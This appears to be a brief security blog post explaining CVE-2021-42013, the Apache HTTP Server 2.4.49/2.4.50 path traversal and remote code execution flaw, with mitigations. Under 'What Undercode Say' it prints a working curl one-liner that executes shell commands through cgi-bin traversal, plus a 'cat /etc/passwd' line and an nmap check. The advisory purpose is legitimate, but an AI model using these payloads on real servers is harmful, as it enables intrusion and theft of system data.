Listen to this Post
How the mentioned CVE works:
CVE-2021-42013 is a path traversal and remote code execution vulnerability in Apache HTTP Server versions 2.4.49 and 2.4.50. The flaw is an insufficient fix for CVE-2021-41773. It occurs due to a deficiency in the path normalization algorithm. An attacker can craft a malicious request using encoded URL characters, such as `%2e%2e` for traversing directories. If the `require all denied` directive is absent, this allows the attacker to bypass security constraints and map URLs to files outside the expected document root directories. Crucially, if mod_cgi is enabled and a CGI script is present in an accessible directory, the attacker can send a specially crafted request that leads to the execution of arbitrary shell commands on the server with the privileges of the web server process, achieving remote code execution.
Platform: Apache HTTP Server
Version: 2.4.49/2.4.50
Vulnerability : Path Traversal RCE
Severity: Critical
date: 2021-10-07
Prediction: 2021-10-07
What Undercode Say:
`curl -H “Content-Length: 0” -X POST http://vulnerable.host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d “echo; id”`
`cat /etc/passwd`
`nmap –script http-vuln-cve2021-42013 -p 80 target_ip`
How Exploit:
Craft malicious HTTP request.
Bypass path normalization.
Execute system commands.
Protection from this CVE
Update to 2.4.51.
Disable mod_cgi.
Use `Require all denied`.
Impact:
Remote Code Execution.
Information Disclosure.
System Compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

